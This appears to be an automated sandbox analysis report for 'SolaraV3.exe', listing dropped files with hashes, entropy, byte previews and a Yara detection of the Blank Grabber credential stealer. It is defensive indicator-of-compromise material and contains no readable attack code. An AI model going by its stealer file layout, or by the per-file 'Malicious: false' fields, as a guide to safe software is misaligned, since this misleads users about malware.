SHA1:	2378F1DB6292CD8DC4AD95763A42AD49AEB11337
SHA-256:	70C28EC0770EDEFCEF46FA27AAA08BA8DC22A31ACD6F84CB0B99257DCA1B629E
SHA-512:	F905EB1817D7D4CC1F65E3A5A01BADE761BCA15C4A24AF7097BC8F3F2B43B00E000D6EA23CD054C391D3FDC2F1114F2AF43C8BB6D97C1A0CE747763260A864F5
Malicious:	false
Reputation:	unknown
Preview:	PK..........!..^".5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Ze..Ze.e..Z+e.,....[d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d..de8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes

Download File

Process:	C:\Users\user\Desktop\SolaraV3.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	80059
Entropy (8bit):	7.83354552845193
Encrypted:	false
SSDEEP:	1536:voYkuW1EFQ8d1xPG5e9qzEucyLNBw+v81iNRj4LYrmCaiGkbOBSzrNr+62:vQcFKe09XN6+2iL6qYGZk
MD5:	2FCDAE27E8550D5159993C37A1A3ADD8
SHA1:	D3EAC11B04BA62043E94D637B830AF21009FD309
SHA-256:	7BCAE0D278321E777290953351C27571CC2272D563C5CEA6D34EBB0786ED10CE
SHA-512:	6060482ADC1387CDEE2402BB57181FFD27049640CCD12046488546584F4639315C30579B9B794483A91BF95A2AB24C1B70AD0C7D83F02A6A12D914DF128F2CAE
Malicious:	false
Reputation:	unknown
Preview:	PK........s.<Y..2E8..E8......stub-o.pyco........Z.f&........................@...sl...e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.e.e.e.e.g.d...........e.g.d...........e.g.d.............Z.d.d...Z.d.Z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e...Z.z.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............e.e...........pie.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d.............d.....W.nA..e.e.e.e.e.g.d...........e.g.d...........e.g.d.............e.e.e.g.d...........e.g.d...........e.g.d...............y.......Y.n.w.G.d.d...d...Z.d.S.)....b....a....s....e....6....4.....r.

C:\Users\user\AppData\Local\Temp\_MEI28842\libcrypto-1_1.dll

Download File

Process:	C:\Users\user\Desktop\SolaraV3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1112856
Entropy (8bit):	7.937513332106868
Encrypted:	false
SSDEEP:	24576:AfVpBeOErQiWG03fz7UuJ7G/y1Pcg8rWgrnNFF+EoIFAVMBU1CPwDv3uFfJN:4pBejNWGoXFJ7ay14rWgrnNxoIFAy+1Y
MD5:	BBC1FCB5792F226C82E3E958948CB3C3
SHA1:	4D25857BCF0651D90725D4FB8DB03CCADA6540C3
SHA-256:	9A36E09F111687E6B450937BB9C8AEDE7C37D598B1CCCC1293EED2342D11CF47
SHA-512:	3137BE91F3393DF2D56A3255281DB7D4A4DCCD6850EEB4F0DF69D4C8DDA625B85D5634FCE49B195F3CC431E2245B8E9BA401BAAA08778A467639EE4C1CC23D8D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..........&..n5...&...................................7...........`......................................... .5.......5.h.....5.......2...............7......................................z5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc.........5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI28842\libffi-7.dll

Download File

Process:	C:\Users\user\Desktop\SolaraV3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	24088
Entropy (8bit):	7.527291720504194
Encrypted:	false
SSDEEP:	384:hRZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:rwlGuUm2Evb1p07pWDG4yKRF
MD5:	6F818913FAFE8E4DF7FEDC46131F201F
SHA1:	BBB7BA3EDBD4783F7F973D97B0B568CC69CADAC5
SHA-256:	3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
SHA-512:	5473FE57DC40AF44EDB4F8A7EFD68C512784649D51B2045D570C7E49399990285B59CFA6BCD25EF1316E0A073EA2A89FE46BE3BFC33F05E3333037A1FD3A6639
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll

Download File

Process:	C:\Users\user\Desktop\SolaraV3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	209688
Entropy (8bit):	7.925861479415686
Encrypted:	false
SSDEEP:	3072:He9fHP8SzrOGFIXkUNNlvBK8Tg111WMEGf0+fGYahm8YNIqepRLvwdlMrQk/OlfJ:+99u/XRxpK8M111nEE0iGYziqGdvwLeO
MD5:	AD0A2B4286A43A0EF05F452667E656DB
SHA1:	A8835CA75768B5756AA2445CA33B16E18CEACB77
SHA-256:	2AF3D965863018C66C2A9A2D66072FE3657BBD0B900473B9BBDCAC8091686AE1
SHA-512:	CCEB5EC1DD6D2801ABBACD6112393FECBF5D88FE52DB86CFC98F13326C3D3E31C042B0CC180B640D0F33681BDD9E6A355DC0FBFDE597A323C8D9E88DE40B37C4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1}q.1}q.1}q.8..=}q.~.p.3}q.z.p.3}q.~.t.=}q.~.u.9}q.~.r.5}q...p.2}q.1}p..\|q...u..}q...q.0}q.....0}q...s.0}q.Rich1}q.........PE..d......c.........." ...".....P...`.......p................................................`..........................................6..4@...3.......0...........N...........v.......................................&..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll

Download File

Process:	C:\Users\user\Desktop\SolaraV3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1514776
Entropy (8bit):	7.99244120733247
Encrypted:	true
SSDEEP:	24576:AqrG9EWpLjdwiANNmpsWKCixQvvkZVqezQv4ivFf1BiuY1Gb+Dyl3/lJYjhYPkm9:A9xdvANw3J72q016ie6Ds/lJYjhq/
MD5:	4A6AFA2200B1918C413D511C5A3C041C
SHA1:	39CA3C2B669ADAC07D4A5EB1B3B79256CFE0C3B3
SHA-256:	BEC187F608507B57CF0475971BA646B8AB42288AF8FDCF78BCE25F1D8C84B1DA
SHA-512:	DBFFB06FFFF0542200344EA9863A44A6F1E1B783379E53DF18580E697E8204D3911E091DEB32A9C94B5599CDD54301B705B74E1F51104151CF13B89D57280A20
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." ..... .......P/..jE..`/..................................`F...........`...........................................E.......E.d.....E......`B..............PF......................................vE.8...........................................UPX0.....P/.............................UPX1..... ...`/.....................@....rsrc.........E.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Download File

Process:	C:\Users\user\Desktop\SolaraV3.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key

Download File

Process:	C:\Users\user\Desktop\SolaraV3.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key, Author: Joe Security
Reputation:	unknown
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd

Download File

Process:	C:\Users\user\Desktop\SolaraV3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.406438297877472
Encrypted:	false
SSDEEP:	384:7iRf5SV1a/KjrtZa7gJXEOBILQGe6vHQIYiSy1pCQ6wYPxh8E9VF0NyvrO:7GxSVQiVpUOBILQGek5YiSyvrYPxWEl6
MD5:	B6DE7C98E66BDE6ECFFBF0A1397A6B90
SHA1:	63823EF106E8FD9EA69AF01D8FE474230596C882
SHA-256:	84B2119ED6C33DFBDF29785292A529AABBF75139D163CFBCC99805623BB3863C
SHA-512:	1FC26E8EDC447D87A4213CB5DF5D18F990BBA80E5635E83193F2AE5368DD88A81FDDFB4575EF4475E9BF2A6D75C5C66C8ED772496FFA761C0D8644FCF40517CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .....0...............................................................`......................................... ...L....................`..............l..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\SolaraV3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	637208
Entropy (8bit):	7.9938769843425055
Encrypted:	true
SSDEEP:	12288:cgQcg1GTl88t0wK2F/vqa544fHQ8+f9qwSKjxC785HhqNFAKNiyxWS/:cgduil88t7Ksa0DfHQzUKjxC7EhqNFA+
MD5:	0C4996047B6EFDA770B03F8F231E39B8
SHA1:	DFFCABCD4E950CC8EE94C313F1A59E3021A0AD48
SHA-256:	983F31BC687E0537D6028A9A65F4825CC560BBF3CB3EB0D3C0FCC2238219B5ED
SHA-512:	112773B83B5B4B71007F2668B0344BF45DB03BBE1F97AE738615F3C4E2F8AFB54B3AE095EA1131BF858DDFB1E585389658AF5DB56561609A154AE6BB80DC79BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.v....@...@...@...@...@I..A...@I..A...@I..A...@I..A...@P..A...@...@...@..A...@..A...@..@...@..A...@Rich...@........PE..d.....,d.........." .....`...0.......Z....................................................`..........................................{..."...x.......p.......0..L....................................................f..8...........................................UPX0....................................UPX1.....`.......X..................@....rsrc....0...p.......\..............@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\SolaraV3.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	296728
Entropy (8bit):	7.985011478309557
Encrypted:	false
SSDEEP:	6144:UcNGPr86AeT4HbUO2GkYmuUuQG1a7kj04fuNPYn/VoR4:UcNGz86iHbUORk+D1a7kLWNwna4
MD5:	C697DC94BDF07A57D84C7C3AA96A2991
SHA1:	641106ACD3F51E6DB1D51AA2E4D4E79CF71DC1AB
SHA-256:	58605600FDAAFBC0052A4C1EB92F68005307554CF5AD04C226C320A1C14F789E
SHA-512:	4F735678B7E38C8E8B693593696F9483CF21F00AEA2A6027E908515AA047EC873578C5068354973786E9CFD0D25B7AB1DD6CBB1B97654F202CBB17E233247A61
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)\|.K(.eJ)..K(.eJ).eK).eJ)\|.G(.eJ)\|.J(.eJ)\|..).eJ)\|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....P...........V... ................................................`..........................................{..X....y.......p..........H............{.......................................b..8...........................................UPX0....................................UPX1.....P... ...F..................@....rsrc........p.......J..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0umvczke.yjq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21u3tjdl.isn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2anuzdex.hfv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nx5tlhe.uy0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_45y04qvf.dom.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5pqqnxlf.mfu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h33ja5af.4yp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hp54fb1q.2gs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o10m2tcb.yza.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odi1wr22.l0h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prybmjqg.2sy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qguj5uuh.d2k.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhwlnnpk.ucj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvkwfz0s.3d3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2h1d4le.1dp.psm1

